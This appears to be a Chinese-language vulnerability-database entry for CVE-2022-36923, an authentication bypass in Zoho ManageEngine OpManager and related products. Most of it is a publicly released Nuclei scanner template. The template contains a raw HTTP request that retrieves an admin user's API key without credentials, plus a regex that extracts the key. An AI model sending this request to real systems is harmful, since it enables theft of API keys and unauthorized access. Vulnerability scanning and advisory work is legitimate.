CVE-2022-36923: Zoho ManageEngine - getUserAPIKey Authentication Bypass

日期: 2026-01-08 | 影响软件: Zoho ManageEngine | POC: 已公开

漏洞描述

Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user's API key, and then access external APIs.

PoC代码[已公开]

id: CVE-2022-36923

info:
  name: Zoho ManageEngine - getUserAPIKey Authentication Bypass
  author: daffainfo,jjcho
  severity: high
  description: |
    Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user's API key, and then access external APIs.
  impact: |
    Attackers can obtain API keys and access external APIs, leading to potential data theft or unauthorized actions.
  remediation: |
    Apply the security patches released after 2022-07-28 or update to the latest version.
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2022-36923.html
    - https://y4er.com/posts/cve-2022-36923-manageengine-opmanager-getuserapikey-authentication-bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36923
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36923
    epss-score: 0.23665
    epss-percentile: 0.95799
    cwe-id: CWE-755,CWE-284
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_msp:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_plus:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_oputils:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_firewall_analyzer,manageengine_netflow_analyzer,manageengine_network_configuration_manager,manageengine_opmanager,manageengine_opmanager_msp,manageengine_opmanager_plus,manageengine_oputils
  tags: cve,cve2022,zoho,manageengine,opmanager,oputils,auth-bypass,vkev

http:
  - raw:
      - |
        POST /RestAPI/getAPIKey HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=getUserAPIKey&username=admin&domainname=-&HANDSHAKE_KEY=pppppppppppppppppppppppppppppppppppp

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 34"
          - 'regex("[0-9a-f]+", body)'
          - "status_code == 200"
          - "contains(set_cookie, 'opmcsrfcookie=')"
        condition: and

    extractors:
      - type: regex
        regex:
          - '[0-9a-f]+'
# digest: 4b0a00483046022100dc0c092eff6418f3a865f8c4c66dc2b7111cccac86aade5babbdd9f0f64d024f022100c48805a02d642530f010011138c858fbfd276ca65f4eca9ff6abf575ee1a0c10:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36923.yaml

相关漏洞推荐